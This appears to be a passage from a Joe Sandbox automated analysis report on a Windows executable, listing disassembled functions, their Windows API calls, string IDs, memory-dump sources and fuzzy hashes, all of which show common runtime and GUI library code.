                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$FreeString$H_prolog$Copy
                                                                                                                • String ID: `5w
                                                                                                                • API String ID: 3345578691-4151700305
                                                                                                                • Opcode ID: b4554ffb9450bab719ed45a6d922262881c082f72bee86d12f6ed75e7d70831e
                                                                                                                • Instruction ID: d3263be15b4144360796143ba88861a41a262f4f81409c292a14040a6c174df0
                                                                                                                • Opcode Fuzzy Hash: b4554ffb9450bab719ed45a6d922262881c082f72bee86d12f6ed75e7d70831e
                                                                                                                • Instruction Fuzzy Hash: 64516A71D00209EFDB14CFA8D885BEEBBB8FF19314F10412AE116A7291D779A940CF68
                                                                                                                Function 004D4680 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(005265C0,00526124,00000000,?,005265C0,?,004D48E8,00526124,00000000), ref: 004D468B
                                                                                                                • RtlEnterCriticalSection.NTDLL(005265DC), ref: 004D46DA
                                                                                                                • RtlLeaveCriticalSection.NTDLL(005265DC), ref: 004D46ED
                                                                                                                • LocalAlloc.KERNEL32(00000000,00000004,?,004D48E8,00526124,00000000), ref: 004D4703
                                                                                                                • LocalReAlloc.KERNEL32(?,00000004,00000002,?,004D48E8,00526124,00000000), ref: 004D4715
                                                                                                                • TlsSetValue.KERNEL32(005265C0,00000000,004D48E8,00526124,00000000), ref: 004D4751
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                                                                                                • String ID: $aR$jGM
                                                                                                                • API String ID: 4117633390-4204794069
                                                                                                                • Opcode ID: 4dea26692fb257e565ad4762821720796a2aed68679fd111bd2e3659906d7c05
                                                                                                                • Instruction ID: ed0cd68125026e30bf52e50c097c2c572bcfdad63eccc35cae1a666a255a4b70
                                                                                                                • Opcode Fuzzy Hash: 4dea26692fb257e565ad4762821720796a2aed68679fd111bd2e3659906d7c05
                                                                                                                • Instruction Fuzzy Hash: 6231DF31200605AFD724DF15C899F66B7E8FB85364F00C62BE816CB750E778E805CB64
                                                                                                                Function 004C0AF7 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,004BB803,?,Microsoft Visual C++ Runtime Library,00012010,?,004EFDD4,?,004EFE24,?,?,?,Runtime Error!Program: ), ref: 004C0B09
                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004C0B21
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004C0B32
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004C0B3F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                • API String ID: 2238633743-4044615076
                                                                                                                • Opcode ID: edb3010b7bb584cd3b215e43eeed3facb8c6e29d71595242ce68b20e7da75516
                                                                                                                • Instruction ID: 7dd22ad6d747547a21a5b44a93ba0f40893a72be335a9a6ac8e70689234de689
                                                                                                                • Opcode Fuzzy Hash: edb3010b7bb584cd3b215e43eeed3facb8c6e29d71595242ce68b20e7da75516
                                                                                                                • Instruction Fuzzy Hash: 03017935600301DB8750EFF59CC0E273A989F957D4710403EA205D2221EB689C05EB65
                                                                                                                Function 004541F4 Relevance: 13.7, APIs: 9, Instructions: 212windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004541F9
                                                                                                                  • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00454257
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454287
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 004542A1
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004542F8
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 0045431E
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 0045434E
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 00454368
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00412607: __EH_prolog.LIBCMT ref: 0041260C
                                                                                                                • SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 004543BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog$IncrementInterlockedWindowlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2349895815-0
                                                                                                                • Opcode ID: 11dc53cfd5e18ba99c1ab244002f22393168f8b9af8721a792850466d76a6f8b
                                                                                                                • Instruction ID: 0f506ce8954469c488c900138b360ebfbc1331f2d2121a3dfbb2e0c51a6c8988
                                                                                                                • Opcode Fuzzy Hash: 11dc53cfd5e18ba99c1ab244002f22393168f8b9af8721a792850466d76a6f8b
                                                                                                                • Instruction Fuzzy Hash: 2E818270D00209AFCB15EFA5C881DAEBBB4FF44358F10812FF521A7291C7349A86CB95
                                                                                                                Function 00454465 Relevance: 13.7, APIs: 9, Instructions: 180windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0045446A
                                                                                                                • SendMessageA.USER32(?,0000018A,00000000,00000000), ref: 004544EA
                                                                                                                • SendMessageA.USER32(?,00000189,00000000,00000000), ref: 00454504
                                                                                                                • SendMessageA.USER32(?,00000187,00000000,00000000), ref: 00454520
                                                                                                                • SendMessageA.USER32(?,00000199,00000000,00000000), ref: 0045453C
                                                                                                                  • Part of subcall function 0044E274: __EH_prolog.LIBCMT ref: 0044E279
                                                                                                                • SendMessageA.USER32(?,0000018A,00000000,00000000), ref: 004545A4
                                                                                                                • SendMessageA.USER32(?,00000189,00000000,00000000), ref: 004545BE
                                                                                                                  • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                                                • SendMessageA.USER32(?,00000187,00000000,00000000), ref: 004545E8
                                                                                                                • SendMessageA.USER32(?,00000199,00000000,00000000), ref: 00454604
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog$IncrementInterlockedlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2120755305-0
                                                                                                                • Opcode ID: a6363a4f8b15493432b93513a64ee823756bf4c33552285175304cb67b412949
                                                                                                                • Instruction ID: 3fe16c27308a7f273a309212a60edb7f7a478c157730eef1129ec3dabc566b6e
                                                                                                                • Opcode Fuzzy Hash: a6363a4f8b15493432b93513a64ee823756bf4c33552285175304cb67b412949
                                                                                                                • Instruction Fuzzy Hash: 5461A375500A04BFDB15DF61CC81FAAB7A4FF04358F10862EB9268B1E2DB74E945CB84
                                                                                                                Function 004B830F Relevance: 13.7, APIs: 9, Instructions: 177COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LCMapStringW.KERNEL32(00000000,00000100,004EF9B4,00000001,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B8351
                                                                                                                • LCMapStringA.KERNEL32(00000000,00000100,004EF9B0,00000001,00000000,00000000), ref: 004B836D
                                                                                                                • LCMapStringA.KERNEL32(000000FF,00000000,00000000,?,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B83B6
                                                                                                                • MultiByteToWideChar.KERNEL32(000000FF,00000002,00000000,?,00000000,00000000,00000100,00000001,000000FF,00000000,00000000,?), ref: 004B83EE
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 004B8446
                                                                                                                • LCMapStringW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000), ref: 004B845C
                                                                                                                • LCMapStringW.KERNEL32(000000FF,00000000,?,00000000,?,?), ref: 004B848F
                                                                                                                • LCMapStringW.KERNEL32(000000FF,00000000,?,?,?,00000000), ref: 004B84F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 352835431-0
                                                                                                                • Opcode ID: 035948d0448e935f1d6a92f2213e9765e1f7940df541159e68de47f0b8c54199
                                                                                                                • Instruction ID: e082a44f3e2bb8a7756a0c88414deab590bbeda92a5e332a3a8e7098312c4495
                                                                                                                • Opcode Fuzzy Hash: 035948d0448e935f1d6a92f2213e9765e1f7940df541159e68de47f0b8c54199
                                                                                                                • Instruction Fuzzy Hash: EE518C3190024ABFCF228F95DC45AEF7FB8FB59744F10412AF914A1261D73A8D21DB68
                                                                                                                Function 0045468E Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 004546DE
                                                                                                                • SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 004546EF
                                                                                                                • SendMessageA.USER32(?,00000187,-00000001,00000000), ref: 00454719
                                                                                                                • SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 0045472E
                                                                                                                • SendMessageA.USER32(?,0000019A,-00000001,00000000), ref: 00454762
                                                                                                                  • Part of subcall function 00453EB2: SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00453ED2
                                                                                                                • SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 00454775
                                                                                                                • SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 00454786
                                                                                                                • SendMessageA.USER32(?,00000187,-00000001,00000000), ref: 004547B0
                                                                                                                • SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 004547C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 9d424f7faa6640edf5568d2df651565a4e5bae144d8f425ee96569ccf9f6e87c
                                                                                                                • Instruction ID: 5e9a9b81965fbea2af03e51d27b52f1264a7eec932526d5f9b2a139a8de14b1b
                                                                                                                • Opcode Fuzzy Hash: 9d424f7faa6640edf5568d2df651565a4e5bae144d8f425ee96569ccf9f6e87c
                                                                                                                • Instruction Fuzzy Hash: 8651AA74600B05AFD7249F65CC85E27B7E8EF44319F008A1EFA624A6A2CB35EC56CB54
                                                                                                                Function 00468609 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 219COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046860E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0045FB75: __EH_prolog.LIBCMT ref: 0045FB7A
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologInterlocked$DecrementIncrementlstrlen
                                                                                                                • String ID: %s > %s$0:R$On Back$On Cancel$On Help$On Next
                                                                                                                • API String ID: 3783261227-3723365219
                                                                                                                • Opcode ID: 886a2aaaa35b24a325c86b528aa1779a57df5c881d486d016d814d32710fbc01
                                                                                                                • Instruction ID: 4a944c17b1db028109ee92335c23cff89e74410a1f1551bbe9654ec97abeb5b7
                                                                                                                • Opcode Fuzzy Hash: 886a2aaaa35b24a325c86b528aa1779a57df5c881d486d016d814d32710fbc01
                                                                                                                • Instruction Fuzzy Hash: 61818FB4910609EFCF04EF65C942B9EBFA5AB14354F10811EF41597282DB78AA84CBE6
                                                                                                                Function 004249D9 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 144COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004249DE
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00424A04
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                • IsWindow.USER32(?), ref: 00424B24
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001), ref: 00424B42
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlockedInvalidateRectWindow__ftol
                                                                                                                • String ID: Enabled$Text$Visible
                                                                                                                • API String ID: 824419852-1258828939
                                                                                                                • Opcode ID: f1604e143b49883e08f8ac970c3f999ad7a6e04ecdffdc8a3e5f9872e46123e8
                                                                                                                • Instruction ID: ec221e6b636f2f9c9309ce8fbb00bb3c8a3b3a2293596e8070ffde19f9e81158
                                                                                                                • Opcode Fuzzy Hash: f1604e143b49883e08f8ac970c3f999ad7a6e04ecdffdc8a3e5f9872e46123e8
                                                                                                                • Instruction Fuzzy Hash: 9F41D7315055217BDB05BB25DC42EEE376D9F46334F24070FF421A62E2DF68A642876D
                                                                                                                Function 00440766 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0044076B
                                                                                                                  • Part of subcall function 004409F9: LoadLibraryA.KERNEL32(WININET.DLL,?,?,00440790), ref: 00440A01
                                                                                                                  • Part of subcall function 004409F9: LoadLibraryExA.KERNEL32(WININET.DLL,00000000,00000008,?,?,00440790), ref: 00440A11
                                                                                                                  • Part of subcall function 004409F9: GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 00440A23
                                                                                                                  • Part of subcall function 004409F9: FreeLibrary.KERNEL32(00000000,?,?,00440790), ref: 00440A35
                                                                                                                  • Part of subcall function 0046DD73: __EH_prolog.LIBCMT ref: 0046DD78
                                                                                                                  • Part of subcall function 00418F0C: InternetGetConnectedState.WININET(?,00000000), ref: 00418F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$H_prologLoad$AddressConnectedFreeInternetProcState
                                                                                                                • String ID: ConnectionConfigured$ConnectionOffline$LAN$Modem$Proxy$RASInstalled
                                                                                                                • API String ID: 3464404234-2123537113
                                                                                                                • Opcode ID: 561aa836a7cd165691d6d3fc28e3f5a06834101098228694d44e986da3cbb941
                                                                                                                • Instruction ID: d4d41e27ece3cff33f9e7cf8186adbb85cae721fa484dd9027bdff4aac6ebe26
                                                                                                                • Opcode Fuzzy Hash: 561aa836a7cd165691d6d3fc28e3f5a06834101098228694d44e986da3cbb941
                                                                                                                • Instruction Fuzzy Hash: 4C416D71842524BADB11BBA69C42FDF6A2DAF46388F14045FF511711A2DB3C16438BAE
                                                                                                                Function 00458BE0 Relevance: 12.1, APIs: 8, Instructions: 138windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00458BE5
                                                                                                                • IsWindow.USER32(?), ref: 00458C04
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458C68
                                                                                                                • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00458CB0
                                                                                                                • SendMessageA.USER32(?,00000189,?,00000000), ref: 00458CCC
                                                                                                                • SendMessageA.USER32(?,00000187,?,00000000), ref: 00458CE5
                                                                                                                • SendMessageA.USER32(?,00000199,?,00000000), ref: 00458D02
                                                                                                                • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458D5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prologWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1863169253-0
                                                                                                                • Opcode ID: 7cdb58cdf524f8178d40fcfd4c9e84f8ae0e6b8f4abedf3c9c72a08a7c67b03d
                                                                                                                • Instruction ID: 753e9bdcde3031a014c8fbe5bb206665f992e0f0f9cefbdd741adcbba1772d3d
                                                                                                                • Opcode Fuzzy Hash: 7cdb58cdf524f8178d40fcfd4c9e84f8ae0e6b8f4abedf3c9c72a08a7c67b03d
                                                                                                                • Instruction Fuzzy Hash: 4541B630600245AFDB15EFA1CC91FAEB775BF50305F14856EE502AA1E2CF799949CB14
                                                                                                                Function 004C8185 Relevance: 12.1, APIs: 8, Instructions: 120windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 004C81B8
                                                                                                                • BeginDeferWindowPos.USER32(00000008), ref: 004C81C6
                                                                                                                • GetTopWindow.USER32(?), ref: 004C81D8
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004C81E7
                                                                                                                • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 004C8219
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 004C8222
                                                                                                                • CopyRect.USER32(?,?), ref: 004C823E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
